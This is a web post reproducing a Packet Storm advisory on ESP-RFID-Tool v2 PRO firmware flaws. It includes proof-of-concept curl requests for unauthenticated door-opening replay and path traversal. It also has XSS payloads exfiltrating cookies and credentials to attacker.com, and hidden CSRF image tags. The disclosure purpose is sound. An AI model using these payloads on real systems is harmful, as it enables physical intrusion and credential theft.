{"id":50207,"date":"2026-04-29T12:45:27","date_gmt":"2026-04-29T12:45:27","guid":{"rendered":"http:\/\/localhost\/?p=50207"},"modified":"2026-04-29T12:45:27","modified_gmt":"2026-04-29T12:45:27","slug":"esp-rfid-tool-v2-pro-traversal-xss-bypass-enumeration","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50207","title":{"rendered":"\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \/ XSS \/ Bypass \/ Enumeration_PACKETSTORM:220045"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T17:06:58&#8243;,&#8221;description&#8221;:&#8221;ESP-RFID-Tool V2 PRO suffers from bypass, cross site request forgery, cross site scripting, information leakage, path traversal, and multiple other vulnerabilities. The vendor has seemingly taken a hostile approach to responding to these findings and&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \/ XSS \/ Bypass \/ Enumeration&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220045&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Security Advisory: ESP-RFID-Tool v2 PRO\\n    \\n    **Product:** ESP-RFID-Tool v2 PRO\\n    **Vendor:** Raik Schneider (Einstein2150), foto-video-it.de\\n    **Repository:** https:\/\/github.com\/Einstein2150\/ESP-RFID-Tool-v2\\n    **Affected Version:** v2.2.1 (latest as of 2026-04-28)\\n    **Severity:** CRITICAL\\n    **Disclosure Type:** Full Public Disclosure\\n    **Disclosure Date:** 2026-04-28\\n    **Researcher:** Milan &#8216;t4c&#8217; Berger\\n    \\n    &#8212;\\n    \\n    ## Disclosure Timeline\\n    \\n    | Date | Event |\\n    |&#8212;&#8212;|&#8212;&#8212;-|\\n    | 2026-04-26 | Vulnerabilities discovered 
during code review |\\n    | 2026-04-27 | Researcher posted responsible disclosure comment on his\\n    advertisement on Youtube (GitHub issues disabled by vendor) |\\n    | 2026-04-28 | Vendor deleted the disclosure comment without response |\\n    | 2026-04-28 | Researcher posted responsible disclosure comment again on\\n    his advertisement on Youtube (GitHub issues disabled by vendor) |\\n    | 2026-04-28 | Vendor deleted the disclosure comment without response |\\n    | 2026-04-28 | Researcher attempted contact via additional social media\\n    channels |\\n    | 2026-04-28 | Vendor blocked researcher on all contacted channels; no\\n    acknowledgment given |\\n    | 2026-04-28 | Full public disclosure \u2014 48h contact window exhausted,\\n    vendor uncooperative |\\n    \\n    &#8212;\\n    \\n    ## Summary\\n    \\n    The ESP-RFID-Tool v2 PRO is a commercial hardware\/firmware product sold by\\n    Raik Schneider targeting security researchers and red team operators. It is\\n    based on an ESP8266 microcontroller and provides a web interface for\\n    logging, replaying, and analyzing Wiegand RFID data from physical access\\n    control systems.\\n    \\n    Multiple critical security vulnerabilities were identified in firmware\\n    v2.2.1. The most severe findings allow any unauthenticated attacker with\\n    network access to: replay captured RFID credentials against physical door\\n    locks, read the complete device configuration including plaintext\\n    passwords, and permanently destroy all captured evidence \u2014 all without\\n    authentication.\\n    \\n    Note: A full practical verification of all exploits involving physical\\n    signal transmission could not be performed as no Wiegand access terminal\\n    was available during testing.\\n    \\n    The vendor was notified through all available channels. All notifications\\n    were deleted, and the researcher was blocked. 
Full disclosure follows.\\n    \\n    &#8212;\\n    \\n    ## Vulnerability Summary\\n    \\n    | ID | Severity | Title |\\n    |&#8212;-|&#8212;&#8212;&#8212;-|&#8212;&#8212;-|\\n    | ESPR-01 | **CRITICAL** | Unauthenticated Wiegand TX \u2014 Physical Access\\n    Control Bypass |\\n    | ESPR-02 | **MEDIUM** | Log Deletion via Default Credentials (Auth\\n    present, but trivially bypassed) |\\n    | ESPR-03 | **CRITICAL** | Path Traversal \u2014 Arbitrary SPIFFS File Read |\\n    | ESPR-04 | **HIGH** | Reflected Cross-Site Scripting (XSS) |\\n    | ESPR-05 | **HIGH** | Stored XSS via Log Injection |\\n    | ESPR-06 | **HIGH** | Hardcoded Default Credentials |\\n    | ESPR-07 | **HIGH** | Unauthenticated Log View + Filesystem Enumeration |\\n    | ESPR-08 | **MEDIUM** | No CSRF Protection \u2014 Entire Application |\\n    | ESPR-09 | **MEDIUM** | Plaintext FTP Server |\\n    | ESPR-10 | **MEDIUM** | Missing Security Response Headers |\\n    | ESPR-11 | **MEDIUM** | No Input Validation on Integer Parameters |\\n    | ESPR-12 | **LOW** | Predictable AP SSID \u2014 Device Fingerprinting |\\n    | ESPR-13 | **INFO** | Captive Portal Mode Widens Attack Surface |\\n    \\n    &#8212;\\n    \\n    ## Detailed Findings\\n    \\n    &#8212;\\n    \\n    ### ESPR-01 \u2014 Unauthenticated Wiegand TX: Physical Access Control Bypass\\n    \\n    **Severity:** CRITICAL\\n    **File:** `api_server.cpp`\\n    **Endpoints:** `\/api\/tx\/bin`, `\/api\/txinstant\/bin`, `\/api\/wiegandencode`\\n    \\n    **Description:**\\n    All Wiegand transmission API endpoints execute hardware TX operations\\n    without any authentication check. 
Any attacker on the same network can\\n    replay arbitrary Wiegand bitstreams to downstream access control hardware \u2014\\n    unlocking physical doors, gates, or secured areas \u2014 with a single\\n    unauthenticated HTTP GET request.\\n    \\n    **Vulnerable Code:**\\n    &#8220;`cpp\\n    server.on(\\&#8221;\/api\/tx\/bin\\&#8221;, []() {\\n        \/\/ &#8230;\\n        \/\/ No server.authenticate() call\\n        apiTX(api_binary, api_pulsewidth, api_datainterval, api_wait);\\n    });\\n    &#8220;`\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Replay a captured 26-bit HID card to open a door\\n    curl \\&#8221;\\n    http:\/\/192.168.1.1\/api\/tx\/bin?binary=01001100110101010110101001\\u0026pulsewidth=40\\u0026interval=2000\\n    \\&#8221;\\n    \\n    # Re-encode a known UID and transmit\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/wiegandencode?uid=DEADBEEF\\u0026format=26\\&#8221;\\n    \\n    # Instant transmission (no response wait)\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/txinstant\/bin?binary=01001100110101010110101001\\n    \\&#8221;\\n    &#8220;`\\n    \\n    **Impact:**\\n    Physical security bypass. An attacker who previously captured a card UID\\n    (e.g. via ESPR-07) can immediately replay it to open the corresponding door\\n    \u2014 all from an unauthenticated HTTP request. This completely undermines the\\n    device&#8217;s operational security model.\\n    \\n    &#8212;\\n    \\n    ### ESPR-02 \u2014 Log Deletion via Default Credentials\\n    \\n    **Severity:** MEDIUM\\n    **File:** `esprfidtool.ino`\\n    **Endpoints:** `\/deletelog`, `\/deletelog\/yes`\\n    \\n    **Description:**\\n    `\/deletelog\/yes` requires HTTP Basic Authentication. However, the default\\n    credentials (`admin:rfidtool`) are hardcoded and publicly known via the\\n    open-source repository. 
Combined with ESPR-06, any attacker with knowledge\\n    of the default credentials can permanently delete all captured RFID logs.\\n    `\/deletelog` (the confirmation page) has **no authentication**, which also\\n    makes it a direct XSS vector (see ESPR-04).\\n    \\n    **Note:** Live testing confirmed `\/deletelog\/yes` returns HTTP 401 without\\n    credentials. This finding was initially rated CRITICAL based on static code\\n    analysis of an earlier version; auth is present in the tested build.\\n    \\n    **Vulnerable Code:**\\n    &#8220;`cpp\\n    server.on(\\&#8221;\/deletelog\/yes\\&#8221;, [](){\\n      if(!server.authenticate(update_username, update_password))\\n        return server.requestAuthentication();\\n      \/\/ Auth present \u2014 but default credentials are public (admin:rfidtool)\\n      SPIFFS.remove(deletelog);\\n    });\\n    &#8220;`\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Delete log using publicly known default credentials\\n    curl -u admin:rfidtool \\&#8221;http:\/\/192.168.1.1\/deletelog\/yes?payload=\/log.txt\\&#8221;\\n    &#8220;`\\n    \\n    **Impact:**\\n    Any attacker who knows the default credentials (publicly available) can\\n    permanently destroy all captured evidence. Severity is driven by ESPR-06\\n    (hardcoded defaults) \u2014 fixing one without the other provides no real\\n    protection.\\n    \\n    &#8212;\\n    \\n    ### ESPR-03 \u2014 Path Traversal: Arbitrary SPIFFS File Read\\n    \\n    **Severity:** CRITICAL\\n    **File:** `esprfidtool.ino` \u2014 `ViewLog()`\\n    \\n    **Description:**\\n    The `payload` parameter is passed directly to `SPIFFS.open()` without any\\n    path validation or sanitization. 
An unauthenticated attacker can read any\\n    file stored in the device&#8217;s SPIFFS filesystem, including configuration\\n    files containing plaintext credentials.\\n    \\n    **Vulnerable Code:**\\n    &#8220;`cpp\\n    void ViewLog(){\\n      String payload;\\n      payload += server.arg(0);  \/\/ raw URL arg, no sanitization\\n      File f = SPIFFS.open(payload, \\&#8221;r\\&#8221;);\\n      \/\/ outputs file content directly to browser\\n    }\\n    &#8220;`\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Note: server.arg(0) reads the FIRST URL argument by position, not by name.\\n    # The correct syntax is ?\\u003cfilename\\u003e, not ?payload=\\u003cfilename\\u003e\\n    \\n    # Read device configuration (contains credentials in plaintext)\\n    curl \\&#8221;http:\/\/192.168.1.1\/viewlog?\/esprfidtool.json\\&#8221;\\n    \\n    # Read log files (enumerate first via \/api\/listlogs)\\n    curl \\&#8221;http:\/\/192.168.1.1\/viewlog?\/log.txt\\&#8221;\\n    \\n    # List all available filenames first\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/listlogs\\&#8221;\\n    &#8220;`\\n    \\n    **Note:** The endpoint only returns content if the file exists on SPIFFS.\\n    The config file `\/esprfidtool.json` is filtered from `ListLogs()` output\\n    but is NOT\\n    filtered in `ViewLog()`, making it directly readable via this endpoint.\\n    \\n    **Example Response:**\\n    &#8220;`json\\n    {\\n      \\&#8221;ssid\\&#8221;: \\&#8221;HomeNetwork\\&#8221;,\\n      \\&#8221;password\\&#8221;: \\&#8221;mysecretwifi\\&#8221;,\\n      \\&#8221;update_username\\&#8221;: \\&#8221;admin\\&#8221;,\\n      \\&#8221;update_password\\&#8221;: \\&#8221;rfidtool\\&#8221;,\\n      \\&#8221;ftp_username\\&#8221;: \\&#8221;ftp-admin\\&#8221;,\\n      \\&#8221;ftp_password\\&#8221;: \\&#8221;rfidtool\\&#8221;\\n    }\\n    &#8220;`\\n    \\n    **Impact:**\\n    Full information disclosure. 
WiFi credentials, admin passwords, FTP\\n    credentials, and all captured RFID card data (UIDs, bitstreams) are exposed\\n    to any unauthenticated attacker.\\n    \\n    &#8212;\\n    \\n    ### ESPR-04 \u2014 Reflected Cross-Site Scripting (XSS)\\n    \\n    **Severity:** HIGH\\n    **File:** `esprfidtool.ino` \u2014 `DeleteLog()`\\n    **Endpoint:** `GET \/deletelog`\\n    \\n    **Description:**\\n    The `payload` URL parameter is reflected directly into the HTML response\\n    body without sanitization or HTML encoding. An attacker can inject\\n    arbitrary JavaScript that executes in the victim&#8217;s browser.\\n    \\n    **Vulnerable Code:**\\n    &#8220;`cpp\\n    \/\/ server.arg(\\&#8221;payload\\&#8221;) embedded directly into HTML \u2014 no htmlEncode()\\n    server.send(200, \\&#8221;text\/html\\&#8221;, \\&#8221;&#8230; Deleting: \\&#8221; + payload + \\&#8221; &#8230;\\&#8221;);\\n    &#8220;`\\n    \\n    **Proof of Concept:**\\n    &#8220;`\\n    # Basic alert PoC\\n    http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003ealert(&#8216;Sag Danke&#8217;)\\u003c\/script\\u003e\\n    \\n    # Cookie exfiltration\\n    http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003edocument.location=&#8217;\\n    http:\/\/attacker.com\/?c=&#8217;+document.cookie\\n    \\u003chttp:\/\/attacker.com\/?c=%27+document.cookie\\u003e\\u003c\/script\\u003e\\n    \\n    # Credential phishing overlay (effective in captive portal context)\\n    http:\/\/192.168.1.1\/deletelog?payload=\\u003cscript\\u003edocument.body.innerHTML=&#8217;\\u003cform\\n    action=\\&#8221;http:\/\/attacker.com\/steal\\&#8221;\\u003e\\u003cinput name=\\&#8221;u\\&#8221;\\n    placeholder=\\&#8221;Username\\&#8221;\\u003e\\u003cinput name=\\&#8221;p\\&#8221; type=\\&#8221;password\\&#8221;\\n    placeholder=\\&#8221;Password\\&#8221;\\u003e\\u003cinput type=\\&#8221;submit\\&#8221;\\u003e\\u003c\/form\\u003e&#8217;\\u003c\/script\\u003e\\n    &#8220;`\\n    \\n    **Impact:**\\n  
  Session hijacking, credential theft, UI redressing. Severity is elevated\\n    because the device operates as a captive portal \u2014 victims auto-connect and\\n    are served the attacker-controlled page.\\n    \\n    &#8212;\\n    \\n    ### ESPR-05 \u2014 Stored XSS via Log Injection\\n    \\n    **Severity:** HIGH\\n    **File:** `esprfidtool.ino` (log write path)\\n    \\n    **Description:**\\n    Log entries are written to SPIFFS containing raw data including HTML\\n    markup. When logs are rendered via `ViewLog()` or `ListLogs()` without\\n    output encoding, an attacker who can inject HTML\/JavaScript into a log\\n    entry achieves persistent stored XSS. This can be triggered by sending a\\n    crafted Wiegand signal or via the unauthenticated TX API.\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Inject XSS payload via unauthenticated TX endpoint\\n    # Craft a bitstream that results in a log entry containing script tags\\n    # The exact binary depends on how the logging function serializes data,\\n    # but the vector is confirmed by the absence of HTML encoding on log output.\\n    \\n    # After injection, any admin viewing logs triggers the payload:\\n    curl \\&#8221;http:\/\/192.168.1.1\/viewlog?payload=\/log.txt\\&#8221;\\n    # -\\u003e \\u003cscript\\u003e&#8230;\\u003c\/script\\u003e executes in admin browser\\n    &#8220;`\\n    \\n    **Impact:**\\n    Persistent XSS. Any administrator viewing the log file executes\\n    attacker-controlled JavaScript. Can be used to steal credentials or pivot\\n    to further attacks.\\n    \\n    &#8212;\\n    \\n    ### ESPR-06 \u2014 Hardcoded Default Credentials\\n    \\n    **Severity:** HIGH\\n    **File:** `esprfidtool.ino` \u2014 `loadDefaults()`\\n    \\n    **Description:**\\n    Default credentials are hardcoded and publicly known via the open-source\\n    repository. 
No forced credential change on first boot.\\n    \\n    | Service | Username | Password |\\n    |&#8212;&#8212;&#8212;|&#8212;&#8212;&#8212;-|&#8212;&#8212;&#8212;-|\\n    | Web Interface \/ OTA Update | `admin` | `rfidtool` |\\n    | FTP Server | `ftp-admin` | `rfidtool` |\\n    | WiFi AP SSID | `ESP-RFID-Tool` | *(none by default)* |\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Authenticated firmware update with known default credentials\\n    curl -u admin:rfidtool \\&#8221;http:\/\/192.168.1.1:1337\/update\\&#8221; -F\\n    \\&#8221;image=@malicious.bin\\&#8221;\\n    \\n    # FTP login\\n    ftp 192.168.1.1\\n    # Login: ftp-admin \/ rfidtool\\n    &#8220;`\\n    \\n    **Impact:**\\n    Trivial full authentication bypass for all credential-protected endpoints.\\n    Anyone familiar with the product has immediate access.\\n    \\n    &#8212;\\n    \\n    ### ESPR-07 \u2014 Unauthenticated Log View + Filesystem Enumeration\\n    \\n    **Severity:** HIGH\\n    **File:** `esprfidtool.ino`\\n    **Endpoints:** `\/viewlog`, `\/listlogs`, `\/api\/listlogs`, `\/api\/info`,\\n    `\/api\/lastread`\\n    \\n    **Description:**\\n    All log viewing and filesystem enumeration endpoints require no\\n    authentication. 
The `\/api\/lastread` endpoint additionally exposes the last\\n    captured card in real time.\\n    \\n    **Proof of Concept:**\\n    &#8220;`bash\\n    # Enumerate all files on device\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/listlogs\\&#8221;\\n    \\n    # Read captured card data\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/lastread\\&#8221;\\n    # Response:\\n    {\\&#8221;bits\\&#8221;:26,\\&#8221;bitstream\\&#8221;:\\&#8221;01001100&#8230;\\&#8221;,\\&#8221;uid\\&#8221;:\\&#8221;0A1B2C3D\\&#8221;,\\&#8221;format\\&#8221;:\\&#8221;HID26\\&#8221;}\\n    \\n    # Get device info (firmware version, free space)\\n    curl \\&#8221;http:\/\/192.168.1.1\/api\/info\\&#8221;\\n    &#8220;`\\n    \\n    **Impact:**\\n    Complete exfiltration of all captured RFID card data without any\\n    authentication.\\n    \\n    &#8212;\\n    \\n    ### ESPR-08 \u2014 No CSRF Protection\\n    \\n    **Severity:** MEDIUM\\n    **Scope:** All endpoints\\n    \\n    **Description:**\\n    No CSRF tokens exist. No `SameSite` cookie attributes. No\\n    `Origin`\/`Referer` validation. 
An attacker who can get an operator to visit\\n    a malicious webpage triggers arbitrary device actions.\\n    \\n    **Proof of Concept:**\\n    &#8220;`html\\n    \\u003c!&#8211; Malicious webpage \u2014 operator visits while connected to device AP &#8211;\\u003e\\n    \\u003c!&#8211; Silently deletes all logs &#8211;\\u003e\\n    \\u003cimg src=\\&#8221;http:\/\/192.168.1.1\/deletelog\/yes?payload=\/log.txt\\&#8221;\\n    style=\\&#8221;display:none\\&#8221;\\u003e\\n    \\n    \\u003c!&#8211; Opens a door via CSRF + unauthenticated TX (ESPR-01) &#8211;\\u003e\\n    \\u003cimg src=\\&#8221;\\n    http:\/\/192.168.1.1\/api\/tx\/bin?binary=01001100110101010110101001\\u0026pulsewidth=40\\u0026interval=2000\\&#8221;\\n    style=\\&#8221;display:none\\&#8221;\\u003e\\n    &#8220;`\\n    \\n    &#8212;\\n    \\n    ### ESPR-09 \u2014 Plaintext FTP Server\\n    \\n    **Severity:** MEDIUM\\n    \\n    FTP credentials and all transferred log data (card UIDs, bitstreams) are\\n    transmitted in cleartext. 
Trivially intercepted on shared WiFi networks.\\n    \\n    &#8212;\\n    \\n    ### ESPR-10 \u2014 Missing Security Response Headers\\n    \\n    **Severity:** MEDIUM\\n    \\n    No HTTP responses include:\\n    &#8211; `Content-Security-Policy` \u2014 allows unrestricted script execution\\n    (amplifies XSS)\\n    &#8211; `X-Frame-Options` \u2014 clickjacking via iframe\\n    &#8211; `X-Content-Type-Options`\\n    &#8211; `Cache-Control` on sensitive endpoints\\n    \\n    &#8212;\\n    \\n    ### ESPR-11 \u2014 No Input Validation on Integer Parameters\\n    \\n    **Severity:** MEDIUM\\n    **File:** `api_server.cpp`\\n    \\n    &#8220;`cpp\\n    api_pulsewidth = server.arg(\\&#8221;pulsewidth\\&#8221;).toInt();  \/\/ no bounds check\\n    api_datainterval = server.arg(\\&#8221;interval\\&#8221;).toInt();   \/\/ no bounds check\\n    api_wait = server.arg(\\&#8221;wait\\&#8221;).toInt();               \/\/ no bounds check\\n    &#8220;`\\n    \\n    `toInt()` returns 0 on invalid input. Negative values or extreme integers\\n    passed to `apiTX()` may cause undefined hardware behavior or firmware\\n    crashes.\\n    \\n    &#8212;\\n    \\n    ### ESPR-12 \u2014 Predictable AP SSID\\n    \\n    **Severity:** LOW\\n    \\n    Default SSID `ESP-RFID-Tool` allows passive wardriving to identify and\\n    target deployed units. A trivial scanner can auto-enumerate all deployed\\n    devices in range.\\n    \\n    &#8212;\\n    \\n    ### ESPR-13 \u2014 Captive Portal as Attack Force-Multiplier\\n    \\n    **Severity:** INFO\\n    \\n    The device runs a DNS server resolving all domains to itself. Victims\\n    auto-connecting to the AP have all their HTTP traffic redirected to the\\n    device. Combined with XSS findings (ESPR-04, ESPR-05), this enables\\n    large-scale credential phishing against unknowing users.\\n    \\n    &#8212;\\n    \\n    ## Recommendations\\n    \\n    1. 
Add `server.authenticate()` to **all** endpoints, not only `\/settings`\\n    2. HTML-encode all URL parameters before inserting into HTML responses\\n    3. Restrict `SPIFFS.open()` to a whitelist of allowed log filenames\\n    4. Implement CSRF token validation for all state-changing requests\\n    5. Force credential change on first boot\\n    6. Add `Content-Security-Policy` and other security headers to all responses\\n    7. Validate and bound-check all integer parameters\\n    8. Consider disabling FTP by default; document security implications clearly\\n    \\n    &#8212;\\n    \\n    ## Researcher\\n    \\n    **Discovered and reported by:** Milan &#8216;t4c&#8217; Berger\\n    **Disclosure policy:** Responsible disclosure attempted. Vendor deleted all\\n    notifications and blocked researcher on all channels within 48 hours. Full\\n    public disclosure follows as per standard responsible disclosure practice.\\n    \\n    &#8212;\\n    \\n    *This advisory is published in the public interest. 
The ESP-RFID-Tool v2\\n    PRO is a commercial product sold for security research and red team use.\\n    Customers of this product should be aware that the device itself contains\\n    critical security vulnerabilities and may be compromised by any party with\\n    network access.*&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/220045&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/220045\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_ve
ndor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T17:06:58&#8243;,&#8221;description&#8221;:&#8221;ESP-RFID-Tool V2 PRO suffers from bypass, cross site request forgery, cross site scripting, information leakage, path traversal, and multiple other vulnerabilities. The vendor has seemingly&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-50207","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \/ XSS \/ Bypass \/ Enumeration_PACKETSTORM:220045 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50207\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \/ XSS \/ Bypass \/ Enumeration_PACKETSTORM:220045 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-29T17:06:58&#8243;,&#8221;description&#8221;:&#8221;ESP-RFID-Tool V2 PRO suffers from bypass, cross site request forgery, cross site scripting, information leakage, path traversal, and multiple other vulnerabilities. 
The vendor has seemingly...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50207\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T12:45:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \\\/ XSS \\\/ Bypass \\\/ Enumeration_PACKETSTORM:220045\",\"datePublished\":\"2026-04-29T12:45:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207\"},\"wordCount\":2630,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50207#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207\",\"name\":\"\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \\\/ XSS \\\/ Bypass \\\/ Enumeration_PACKETSTORM:220045 - zero 
redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T12:45:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50207\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50207#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ESP-RFID-Tool V2 PRO Traversal \\\/ XSS \\\/ Bypass \\\/ Enumeration_PACKETSTORM:220045\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
